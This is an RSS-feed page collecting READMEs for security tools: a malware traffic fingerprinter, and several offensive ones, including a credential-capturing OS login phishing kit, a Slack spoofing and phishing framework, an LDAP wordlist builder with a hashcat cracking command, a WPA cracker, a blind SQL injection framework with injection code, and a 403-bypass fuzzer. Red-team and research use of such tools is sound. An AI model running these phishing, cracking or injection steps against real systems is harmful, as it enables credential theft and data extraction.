FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

Hfinger - Fingerprinting HTTP Requests

By: Zion3R


Tool for Fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage :-)

Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen only in one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, but still human interpretable.

Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted by other security systems but which share fingerprint.

An academic paper accompanies work on this tool, describing, for example, the motivation of design choices, and the evaluation of the tool compared to p0f, FATT, and Mercury.


    The idea

    The basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about the structure and values of some headers to provide means for further analysis. For example, grouping of similar requests - at this moment, it is still a work in progress.

    After analysis of malware's HTTP requests and headers, we have identified some parts of requests as being most distinctive. These include: * Request method * Protocol version * Header order * Popular headers' values * Payload length, entropy, and presence of non-ASCII characters

    Additionally, some standard features of the request URL were also considered. All these parts were translated into a set of features, described in details here.

    The above features are translated into varying length representation, which is the actual fingerprint. Depending on report mode, different features are used to fingerprint requests. More information on these modes is presented below. The feature selection process will be described in the forthcoming academic paper.

    Installation

    Minimum requirements needed before installation: * Python >= 3.3, * Tshark >= 2.2.0.

    Installation available from PyPI:

    pip install hfinger

    Hfinger has been tested on Xubuntu 22.04 LTS with tshark package in version 3.6.2, but should work with older versions like 2.6.10 on Xubuntu 18.04 or 3.2.3 on Xubuntu 20.04.

    Please note that as with any PoC, you should run Hfinger in a separated environment, at least with Python virtual environment. Its setup is not covered here, but you can try this tutorial.

    Usage

    After installation, you can call the tool directly from a command line with hfinger or as a Python module with python -m hfinger.

    For example:

    foo@bar:~$ hfinger -f /tmp/test.pcap
    [{"epoch_time": "1614098832.205385000", "ip_src": "127.0.0.1", "ip_dst": "127.0.0.1", "port_src": "53664", "port_dst": "8080", "fingerprint": "2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4"}]

    Help can be displayed with short -h or long --help switches:

    usage: hfinger [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2,3,4}] [-v]
    [-l LOGFILE]

    Hfinger - fingerprinting malware HTTP requests stored in pcap files

    optional arguments:
    -h, --help show this help message and exit
    -f FILE, --file FILE Read a single pcap file
    -d DIR, --directory DIR
    Read pcap files from the directory DIR
    -o output_path, --output-path output_path
    Path to the output directory
    -m {0,1,2,3,4}, --mode {0,1,2,3,4}
    Fingerprint report mode.
    0 - similar number of collisions and fingerprints as mode 2, but using fewer features,
    1 - representation of all designed features, but a little more collisions than modes 0, 2, and 4,
    2 - optimal (the default mode),
    3 - the lowest number of generated fingerprints, but the highest number of collisions,
    4 - the highest fingerprint entropy, but slightly more fingerprints than modes 0-2
    -v, --verbose Report information about non-standard values in the request
    (e.g., non-ASCII characters, no CRLF tags, values not present in the configuration list).
    Without --logfile (-l) will print to the standard error.
    -l LOGFILE, --logfile LOGFILE
    Output logfile in the verbose mode. Implies -v or --verbose switch.

    You must provide a path to a pcap file (-f), or a directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to the provided directory (-o) using the name of the source file. For example, output of the command:

    hfinger -f example.pcap -o /tmp/pcap

    will be saved to:

    /tmp/pcap/example.pcap.json

    Report mode -m/--mode can be used to change the default report mode by providing an integer in the range 0-4. The modes differ on represented request features or rounding modes. The default mode (2) was chosen by us to represent all features that are usually used during requests' analysis, but it also offers low number of collisions and generated fingerprints. With other modes, you can achieve different goals. For example, in mode 3 you get a lower number of generated fingerprints but a higher chance of a collision between malware families. If you are unsure, you don't have to change anything. More information on report modes is here.

    Beginning with version 0.2.1 Hfinger is less verbose. You should use -v/--verbose if you want to receive information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. When any such issues are encountered in the verbose mode, they will be printed to the standard error output. You can also save the log to a defined location using -l/--log switch (it implies -v/--verbose). The log data will be appended to the log file.

    Using hfinger in a Python application

    Beginning with version 0.2.0, Hfinger supports importing to other Python applications. To use it in your app simply import hfinger_analyze function from hfinger.analysis and call it with a path to the pcap file and reporting mode. The returned result is a list of dicts with fingerprinting results.

    For example:

    from hfinger.analysis import hfinger_analyze

    pcap_path = "SPECIFY_PCAP_PATH_HERE"
    reporting_mode = 4
    print(hfinger_analyze(pcap_path, reporting_mode))

    Beginning with version 0.2.1 Hfinger uses logging module for logging information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. Hfinger creates its own logger using name hfinger, but without prior configuration log information in practice is discarded. If you want to receive this log information, before calling hfinger_analyze, you should configure hfinger logger, set log level to logging.INFO, configure log handler up to your needs, add it to the logger. More information is available in the hfinger_analyze function docstring.

    Fingerprint creation

    A fingerprint is based on features extracted from a request. Usage of particular features from the full list depends on the chosen report mode from a predefined list (more information on report modes is here). The figure below represents the creation of an exemplary fingerprint in the default report mode.

    Three parts of the request are analyzed to extract information: URI, headers' structure (including method and protocol version), and payload. Particular features of the fingerprint are separated using | (pipe). The final fingerprint generated for the POST request from the example is:

    2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4

    The creation of features is described below in the order of appearance in the fingerprint.

    Firstly, URI features are extracted: * URI length represented as a logarithm base 10 of the length, rounded to an integer, (in the example URI is 43 characters long, so log10(43)β‰ˆ2), * number of directories, (in the example there are 3 directories), * average directory length, represented as a logarithm with base 10 of the actual average length of the directory, rounded to an integer, (in the example there are three directories with total length of 20 characters (6+6+8), so log10(20/3)β‰ˆ1), * extension of the requested file, but only if it is on a list of known extensions in hfinger/configs/extensions.txt, * average value length represented as a logarithm with base 10 of the actual average value length, rounded to one decimal point, (in the example two values have the same length of 4 characters, what is obviously equal to 4 characters, and log10(4)β‰ˆ0.6).

    Secondly, header structure features are analyzed: * request method encoded as first two letters of the method (PO), * protocol version encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9), * order of the headers, * and popular headers and their values.

    To represent order of the headers in the request, each header's name is encoded according to the schema in hfinger/configs/headerslow.json, for example, User-Agent header is encoded as us-ag. Encoded names are separated by ,. If the header name does not start with an upper case letter (or any of its parts when analyzing compound headers such as Accept-Encoding), then encoded representation is prefixed with !. If the header name is not on the list of the known headers, it is hashed using FNV1a hash, and the hash is used as encoding.

    When analyzing popular headers, the request is checked if they appear in it. These headers are: * Connection * Accept-Encoding * Content-Encoding * Cache-Control * TE * Accept-Charset * Content-Type * Accept * Accept-Language * User-Agent

    When the header is found in the request, its value is checked against a table of typical values to create pairs of header_name_representation:value_representation. The name of the header is encoded according to the schema in hfinger/configs/headerslow.json (as presented before), and the value is encoded according to schema stored in hfinger/configs directory or configs.py file, depending on the header. In the above example Accept is encoded as ac and its value */* as as-as (asterisk-asterisk), giving ac:as-as. The pairs are inserted into fingerprint in order of appearance in the request and are delimited using /. If the header value cannot be found in the encoding table, it is hashed using the FNV1a hash.
    If the header value is composed of multiple values, they are tokenized to provide a list of values delimited with ,, for example, Accept: */*, text/* would give ac:as-as,te-as. However, at this point of development, if the header value contains a "quality value" tag (q=), then the whole value is encoded with its FNV1a hash. Finally, values of User-Agent and Accept-Language headers are directly encoded using their FNV1a hashes.

    Finally, in the payload features: * presence of non-ASCII characters, represented with the letter N, and with A otherwise, * payload's Shannon entropy, rounded to an integer, * and payload length, represented as a logarithm with base 10 of the actual payload length, rounded to one decimal point.

    Report modes

    Hfinger operates in five report modes, which differ in features represented in the fingerprint, thus information extracted from requests. These are (with the number used in the tool configuration): * mode 0 - producing a similar number of collisions and fingerprints as mode 2, but using fewer features, * mode 1 - representing all designed features, but producing a little more collisions than modes 0, 2, and 4, * mode 2 - optimal (the default mode), representing all features which are usually used during requests' analysis, but also offering a low number of collisions and generated fingerprints, * mode 3 - producing the lowest number of generated fingerprints from all modes, but achieving the highest number of collisions, * mode 4 - offering the highest fingerprint entropy, but also generating slightly more fingerprints than modes 0-2.

    The modes were chosen in order to optimize Hfinger's capabilities to uniquely identify malware families versus the number of generated fingerprints. Modes 0, 2, and 4 offer a similar number of collisions between malware families, however, mode 4 generates a little more fingerprints than the other two. Mode 2 represents more request features than mode 0 with a comparable number of generated fingerprints and collisions. Mode 1 is the only one representing all designed features, but it increases the number of collisions by almost two times comparing to modes 0, 1, and 4. Mode 3 produces at least two times fewer fingerprints than other modes, but it introduces about nine times more collisions. Description of all designed features is here.

    The modes consist of features (in the order of appearance in the fingerprint): * mode 0: * number of directories, * average directory length represented as an integer, * extension of the requested file, * average value length represented as a float, * order of headers, * popular headers and their values, * payload length represented as a float. * mode 1: * URI length represented as an integer, * number of directories, * average directory length represented as an integer, * extension of the requested file, * variable length represented as an integer, * number of variables, * average value length represented as an integer, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as an integer, * payload length represented as an integer. * mode 2: * URI length represented as an integer, * number of directories, * average directory length represented as an integer, * extension of the requested file, * average value length represented as a float, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as an integer, * payload length represented as a float. * mode 3: * URI length represented as an integer, * average directory length represented as an integer, * extension of the requested file, * average value length represented as an integer, * order of headers. * mode 4: * URI length represented as a float, * number of directories, * average directory length represented as a float, * extension of the requested file, * variable length represented as a float, * average value length represented as a float, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as a float, * payload length represented as a float.



    Thief Raccoon - Login Phishing Tool

    By: Zion3R


    Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.


    Features

    • Phishing simulation for Windows 10, Windows 11, Windows XP, Windows Server, Ubuntu, Ubuntu Server, and macOS.
    • Capture user credentials for educational demonstrations.
    • Customizable login screens that mimic real operating systems.
    • Full-screen mode to enhance the phishing simulation.

    Installation

    Prerequisites

    • Python 3.x
    • pip (Python package installer)
    • ngrok (for exposing the local server to the internet)

    Download and Install

    1. Clone the repository:

    ```bash git clone https://github.com/davenisc/thief_raccoon.git cd thief_raccoon

    1. Install python venv

    ```bash apt install python3.11-venv

    1. Create venv:

    ```bash python -m venv raccoon_venv source raccoon_venv/bin/activate

    1. Install the required libraries:

    ```bash pip install -r requirements.txt

    Usage

    1. Run the main script:

    ```bash python app.py

    1. Select the operating system for the phishing simulation:

    After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.

    1. Access the phishing page:

    If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.

    If you want to make the phishing page accessible over the internet, use ngrok.

    Using ngrok

    1. Download and install ngrok

    Download ngrok from ngrok.com and follow the installation instructions for your operating system.

    1. Expose your local server to the internet:

    2. Get the public URL:

    After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.

    How to install Ngrok on Linux?

    1. Install ngrok via Apt with the following command:

    ```bash curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok

    1. Run the following command to add your authtoken to the default ngrok.yml

    ```bash ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx

    Deploy your app online

    1. Put your app online at ephemeral domain Forwarding to your upstream service. For example, if it is listening on port http://localhost:8080, run:

      ```bash ngrok http http://localhost:5000

    Example

    1. Run the main script:

    ```bash python app.py

    1. Select Windows 11 from the menu:

    ```bash Select the operating system for phishing: 1. Windows 10 2. Windows 11 3. Windows XP 4. Windows Server 5. Ubuntu 6. Ubuntu Server 7. macOS Enter the number of your choice: 2

    1. Access the phishing page:

    Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.

    Disclaimer

    This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.

    License

    This project is licensed under the MIT License. See the LICENSE file for details.

    ScreenShots

    Credits

    Developer: @davenisc Web: https://davenisc.com



    ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

    By: Zion3R


    ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


    Features

    • Identifies potential ROP gadgets in binary executables.
    • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
    • Generates exploit templates to make the exploit process faster
    • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
    • Can print function names and addresses for further analysis.
    • Supports searching for specific instruction patterns.

    Usage

    • <binary>: Path to the binary file for analysis.
    • -s, --search SEARCH: Optional. Search for specific instruction patterns.
    • -f, --functions: Optional. Print function names and addresses.

    Examples

    • Analyze a binary without searching for specific instructions:

    python3 ropdump.py /path/to/binary

    • Analyze a binary and search for specific instructions:

    python3 ropdump.py /path/to/binary -s "pop eax"

    • Analyze a binary and print function names and addresses:

    python3 ropdump.py /path/to/binary -f



    EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

    By: Zion3R

    EvilSlackbot

    A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

    Disclaimer

    This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.


    Background

    Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually provided permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an api token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, files, and search for secrets leaked in slack.

    Phishing Simulations

    In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)

    Installation

    EvilSlackbot requires python3 and Slackclient

    pip3 install slackclient

    Usage

    usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
    [-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]

    options:
    -h, --help show this help message and exit

    Required:
    -t TOKEN, --token TOKEN
    Slack Oauth token

    Attacks:
    -sP, --spoof Spoof a Slack message, customizing your name, icon, etc
    (Requires -e,-eL, or -cH)
    -m, --message Send a message as the bot associated with your token
    (Requires -e,-eL, or -cH)
    -s, --search Search slack for secrets with a keyword
    -a, --attach Send a message containing a malicious attachment (Requires -f
    and -e,-eL, or -cH)

    Arguments:
    -f FILE, --file FILE Path to file attachment
    -e EMAIL, --email EMAIL
    Email of target
    -cH CHANNEL, --channel CHANNEL
    Target Slack Channel (Do not include #)
    -eL EMAIL_LIST, --email_list EMAIL_LIST
    Path to list of emails separated by newline
    -c, --check Lookup and display the permissions and available attacks
    associated with your provided token.
    -o OUTFILE, --outfile OUTFILE
    Outfile to store search results
    -cL, --channel_list List all public Slack channels

    Token

    To use this tool, you must provide a xoxb or xoxp token.

    Required:
    -t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
    python3 EvilSlackbot.py -t <token>

    Attacks

    Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.

    Attacks:
    -sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)

    -m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)

    -s, --search Search slack for secrets with a keyword

    -a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)

    Spoofed messages (-sP)

    With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>

    Phishing Messages (-m)

    With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>

    Secret Search (-s)

    With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.

    python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>

    Attachments (-a)

    With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>

    Arguments

    Arguments:
    -f FILE, --file FILE Path to file attachment
    -e EMAIL, --email EMAIL Email of target
    -cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
    -eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
    -c, --check Lookup and display the permissions and available attacks associated with your provided token.
    -o OUTFILE, --outfile OUTFILE Outfile to store search results
    -cL, --channel_list List all public Slack channels

    Channel Search

    With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.

    python3 EvilSlackbot.py -t <xoxb token> -cL


    LDAPWordlistHarvester - A Tool To Generate A Wordlist From The Information Present In LDAP, In Order To Crack Passwords Of Domain Accounts

    By: Zion3R


    A tool to generate a wordlist from the information present in LDAP, in order to crack non-random passwords of domain accounts.

    Β 

    Features

    The bigger the domain is, the better the wordlist will be.

    • [x] Creates a wordlist based on the following information found in the LDAP:
    • [x] User: name and sAMAccountName
    • [x] Computer: name and sAMAccountName
    • [x] Groups: name
    • [x] Organizational Units: name
    • [x] Active Directory Sites: name and descriptions
    • [x] All LDAP objects: descriptions
    • [x] Choose wordlist output file name with option --outputfile

    Demonstration

    To generate a wordlist from the LDAP of the domain domain.local you can use this command:

    ./LDAPWordlistHarvester.py -d 'domain.local' -u 'Administrator' -p 'P@ssw0rd123!' --dc-ip 192.168.1.101

    You will get the following output if using the Python version:

    You will get the following output if using the Powershell version:


    Cracking passwords

    Once you have this wordlist, you should crack your NTDS using hashcat, --loopback and the rule clem9669_large.rule.

    ./hashcat --hash-type 1000 --potfile-path ./client.potfile ./client.ntds ./wordlist.txt --rules ./clem9669_large.rule --loopback

    Usage

    $ ./LDAPWordlistHarvester.py -h
    LDAPWordlistHarvester.py v1.1 - by @podalirius_

    usage: LDAPWordlistHarvester.py [-h] [-v] [-o OUTPUTFILE] --dc-ip ip address [-d DOMAIN] [-u USER] [--ldaps] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]

    options:
    -h, --help show this help message and exit
    -v, --verbose Verbose mode. (default: False)
    -o OUTPUTFILE, --outputfile OUTPUTFILE
    Path to output file of wordlist.

    Authentication & connection:
    --dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
    -d DOMAIN, --domain DOMAIN
    (FQDN) domain to authenticate to
    -u USER, --user USER user to authenticate with
    --ldaps Use LDAPS instead of LDAP

    Credentials:
    --no- pass Don't ask for password (useful for -k)
    -p PASSWORD, --password PASSWORD
    Password to authenticate with
    -H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
    NT/LM hashes, format is LMhash:NThash
    --aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
    -k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line


    Pyrit - The Famous WPA Precomputed Cracker

    By: Zion3R


    Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.

    WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


    The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

    Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

    Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.

    These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

    • A single storage (e.g. a MySQL-server)
    • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
    • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computional nodes, two of which actually access the RPC-interface.

    What's new

    • Fixed #479 and #481
    • Pyrit CUDA now compiles in OSX with Toolkit 7.5
    • Added use_CUDA and use_OpenCL in config file
    • Improved cores listing and managing
    • limit_ncpus now disables all CPUs when set to value <= 0
    • Improve CCMP packet identification, thanks to yannayl

    See CHANGELOG file for a better description.

    How to use

    Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

    How to participate

    You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).



    Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

    By: Zion3R


    Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

    Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023

    More information can be found in our paper and slides.


    Installation

    To install Hakuin, simply run:

    pip3 install hakuin

    Developers should install the package locally and set the -e flag for editable mode:

    git clone git@github.com:pruzko/hakuin.git
    cd hakuin
    pip3 install -e .

    Examples

    Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

    Example 1 - Query Parameter Injection with Status-based Inference
    import aiohttp
    from hakuin import Requester

    class StatusRequester(Requester):
    async def request(self, ctx, query):
    r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
    return r.status == 200
    Example 2 - Header Injection with Content-based Inference
    class ContentRequester(Requester):
    async def request(self, ctx, query):
    headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
    r = await aiohttp.get(f'http://vuln.com/', headers=headers)
    return 'found' in await r.text()

    To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

    Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
    import asyncio
    from hakuin import Extractor, Requester
    from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

    class StatusRequester(Requester):
    ...

    async def main():
    # requester: Use this Requester
    # dbms: Use this DBMS
    # n_tasks: Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

    if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())

    Now that eveything is set, you can start extracting DB metadata.

    Example 1 - Extracting DB Schemas
    # strategy:
    # 'binary': Use binary search
    # 'model': Use pre-trained model
    schema_names = await ext.extract_schema_names(strategy='model')
    Example 2 - Extracting Tables
    tables = await ext.extract_table_names(strategy='model')
    Example 3 - Extracting Columns
    columns = await ext.extract_column_names(table='users', strategy='model')
    Example 4 - Extracting Tables and Columns Together
    metadata = await ext.extract_meta(strategy='model')

    Once you know the structure, you can extract the actual content.

    Example 1 - Extracting Generic Columns
    # text_strategy:    Use this strategy if the column is text
    res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
    Example 2 - Extracting Textual Columns
    # strategy:
    # 'binary': Use binary search
    # 'fivegram': Use five-gram model
    # 'unigram': Use unigram model
    # 'dynamic': Dynamically identify the best strategy. This setting
    # also enables opportunistic guessing.
    res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
    Example 3 - Extracting Integer Columns
    res = await ext.extract_column_int(table='users', column='id')
    Example 4 - Extracting Float Columns
    res = await ext.extract_column_float(table='products', column='price')
    Example 5 - Extracting Blob (Binary Data) Columns
    res = await ext.extract_column_blob(table='users', column='id')

    More examples can be found in the tests directory.

    Using Hakuin from the Command Line

    Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

    python3 hk.py -h

    For Researchers

    This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

    Cite Hakuin

    @inproceedings{hakuin_bsqli,
    title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
    author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
    booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
    pages={384--393},
    year={2023},
    organization={IEEE}
    }


    BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses

    By: Zion3R


    The original 403fuzzer.py :)

    Fuzz 401/403ing endpoints for bypasses

    This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.

    It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.

    I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.

    You can now feed it raw HTTP requests that you save to a file from Burp.

    Follow me on twitter! @intrudir


    Usage

    usage: bypassfuzzer.py -h

    Specifying a request to test

    Best method: Feed it a raw HTTP request from Burp!

    Simply paste the request into a file and run the script!
    - It will parse and use cookies & headers from the request. - Easiest way to authenticate for your requests

    python3 bypassfuzzer.py -r request.txt

    Using other flags

    Specify a URL

    python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

    Specify cookies to use in requests:
    some examples:

    --cookies "cookie1=blah"
    -c "cookie1=blah; cookie2=blah"

    Specify a method/verb and body data to send

    bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
    bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

    Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>

    Specify -H "header: value" for each additional header you'd like to add:

    bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

    Smart filter feature!

    Based on response code and length. If it sees a response 8 times or more it will automatically mute it.

    Repeats are changeable in the code until I add an option to specify it in flag

